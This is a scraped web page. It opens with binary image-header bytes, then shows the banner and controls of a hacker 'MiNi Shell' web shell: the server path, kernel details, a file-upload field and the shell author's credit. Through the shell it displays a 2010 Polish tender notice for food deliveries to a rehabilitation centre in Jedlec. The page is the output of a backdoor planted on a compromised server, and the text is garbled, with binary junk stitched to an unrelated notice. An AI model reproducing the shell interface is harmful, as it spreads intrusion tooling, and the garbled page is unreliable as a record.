JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100223/51316-N-2010.html

<p class="kh_header"><b>Gołuchów: Dostawy produktów żywnościowych</b><br>
<b>Numer ogłoszenia: 51316 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego , Jedlec, 63-322 Gołuchów, woj. wielkopolskie, tel. 062 7616251,53, faks 062 7616752.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jedlec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy produktów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy produktów żywnościowych, w zakresie określonym w SIWZ, wszystkie produkty najwyższej jakości w pierwszym gatunku. Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania, sukcesywnie. Zamówienie będzie realizowane w następujących częściach:
1.	03142500-3	Jaja kurze, świeże, konsumpcyjne.
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie lub faksem), sukcesywnie, najczęściej dwa razy na tydzień, w dni robocze, w godz. 8:00 ÷ 12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
2.	03200000-3	Zboża, ziemniaki, warzywa.
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie lub faksem), sukcesywnie najczęściej jeden raz na dzień, w dni robocze, w godz. 8:00÷12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
3.	03222000-3 	Owoce i orzechy
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie lub faksem), sukcesywnie najczęściej jeden raz na dzień, w dni robocze, w godz. 8:00 ÷ 12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
4.	15200000-0	Ryby przetworzone i konserwowane
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie, lub faksem), sukcesywnie, najczęściej dwa razy na tydzień, w dni robocze, w godz. 8:00 ÷ 12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
5.	15300000-1	Owoce, warzywa i podobne produkty
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie, lub faksem), sukcesywnie, najczęściej dwa razy na tydzień, w dni robocze, w godz. 8:00 ÷ 12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
6. 15400000-2	Oleje i tłuszcze zwierzęce lub roślinne.
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie, lub faksem), sukcesywnie, najczęściej dwa razy na tydzień, w dni robocze, w godz. 8:00 ÷ 12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
7.
15610000-7	Produkty wytwarzane z przemiału ziarna.
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie, lub faksem), sukcesywnie, najczęściej dwa razy na tydzień, w dni robocze, w godz. 8:00 ÷ 12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.

8.	15800000-6	Różne produkty spożywcze (oprócz pieczywa)
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie, lub faksem), sukcesywnie najczęściej trzy razy na tydzień, w dni robocze, w godz. 8:00 ÷ 12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
9.	15810000-9	Pieczywo, świeże wyroby piekarskie i ciastkarskie
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie, lub faksem), sukcesywnie najczęściej jeden raz na dzień, we wszystkie dni oprócz niedziel i świąt, w godz. 6:30 ÷ 7:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
10.	15896000-5	Produkty głęboko mrożone
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie, lub faksem), sukcesywnie, najczęściej trzy razy na tydzień, w dni robocze, w godz. 8:00 ÷ 12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
11.	15981000-8	Wody mineralne
		Dostawy będą odbywać się na podstawie wcześniej zgłoszonego zapotrzebowania (ustnie, pisemnie, telefonicznie, lub faksem), sukcesywnie, najczęściej dwa razy na tydzień, w dni robocze, w godz. 8:00 ÷ 12:00 w okresie od dnia podpisania umowy do 31.03.2011 r.
Miejsce dostaw - kuchnia CRR KRUS w Jedlcu.
Odbiór dostawy na drukach WZ lub PZ. Faktury za dostawy wystawiane nie więcej niż cztery razy w miesiącu. Termin płatności nie później niż 14 dni od daty otrzymania faktury.
Każda ze wskazanych powyżej części Zamówienia określana będzie dalej mianem Zadania. Zamawiający dopuszcza składnie ofert częściowych tylko na całość poszczególnego Zadania. Zamawiający zastrzega jednocześnie, że jeden wykonawca może złożyć oferty częściowe obejmujące kilka lub wszystkie Zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 03.20.00.00-3, 03.22.20.00-3, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.61.00.00-7, 15.80.00.00-6, 15.81.00.00-9, 15.89.60.00-5, 15.98.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium, jako warunku dopuszczenia w postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dokument właściwego organu dopuszczający posiadane samochody do przewozu środków spożywczych,
2.	Wykaz będących w posiadaniu Wykonawcy środków transportu, 
3.	Odpis polisy ubezpieczeniowej Wykonawcy od odpowiedzialności cywilnej z tytułu prowadzenia działalności będącej przedmiotem niniejszego postępowania na sumę nie niższą w zakresie OC niż 50 000 PLN ,
4.	Oświadczenie o posiadaniu ubezpieczenia w zakresie odpowiedzialności cywilnej z tytułu prowadzenia działalności gospodarczej będącej przedmiotem zamówienia na sumę nie niższą w zakresie OC niż 50 000 PLN oraz zobowiązanie się do przedłożenia Zamawiającemu w przypadku wygaśnięcia w okresie trwania umowy dokumentów: 
-	decyzji właściwego organu w zakresie dopuszczenia środków transportu do przewozu środków spożywczych zwierzęcego pochodzenia, 
-	ubezpieczenia OC,
na co najmniej jeden tydzień przed wygaśnięciem terminu ważności dokumentu i na każde żądanie Zamawiającego, pod rygorem natychmiastowego odstąpienia od umowy.
5.	Odpis dokumentu potwierdzającego wdrożenie systemu HACCP w jednej z następujących form: 
a)	certyfikatu systemu HACCP wydanego przez firmy posiadające akredytacje i uprawnienia Polskiego Centrum Akredytacji z siedzibą w Warszawie lub krajowej organizacji akredytacyjnej dla danego kraju albo
b)	zaświadczenia właściwego organu Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego sytemu HACCP. Przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP - podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 Nr 171 poz. 1225.), wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
6.	Oświadczenie zobowiązujące do:
-	dostaw przedmiotu postępowania w ilości i asortymencie określonych w zamówieniu zgłoszonym telefonicznie lub przesłanym faxem, własnym transportem trzy razy na tydzień w godz. 8:00 ÷ 12:00  na swój koszt i ryzyko; 
-	zagwarantowania we własnym zakresie transportu zastępczego dopuszczonego decyzją właściwego organu do przewozu środków spożywczych w przypadku awarii środka transportu, tak, aby zapewnić ciągłość dostaw;
-	dostarczania towarów spełniających wymagania jakościowe zgodne z obowiązującymi atestami, Polskimi Normami oraz systemem HACCP; 
-	dostarczania produktów oznakowanych widocznym, czytelnym kodem identyfikacyjnym partii produkcyjnej,  umożliwiającym identyfikację artykułu rolno-spożywczego z danej partii produkcyjnej, nadanym przez producenta i umożliwiającym jego identyfikację, umieszczonym na produkcie w sposób wykluczający jego przesunięcie się;
-	dostarczania wraz z każdą dostawą dokumentu HDI;
-	stosowania przy produkcji mleka i jego przetworów norm odpowiadających wartościom określonym w Polskich Normach (PN).
-	stosowania wyłącznie wyselekcjonowanych, o potwierdzonych odpowiednimi certyfikatami jakości i pochodzenia towarów i surowców w celu utrzymania stabilnego, wysokiego standardu oferowanych wyrobów, gwarantującego bezpieczeństwo zdrowotne konsumentom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość waloryzacji cen w drodze porozumienia stron. 
2.	Podstawą waloryzacji jest półroczny wskaźnik cen towarów i usług konsumpcyjnych (inflacja) w stosunku do poprzedniego półrocza ogłaszany przez Prezesa GUS dla poszczególnych grup towarów objętych umową.
3.	Waloryzacja powodująca zmniejszenie lub zwiększenie cen przyjętych w umowie może być dokonana na wniosek Zamawiającego lub Wykonawcy, zgłoszony pisemnie nie wcześniej jednak niż po 6 miesiącach obowiązywania umowy lub ostatniego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jedlec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> CRR KRUS w Jedlcu; 63-322 Gołuchów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2010 godzina 12:30, miejsce: Pokój kierownika Działu Administracji CRR KRUS w Jedlcu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com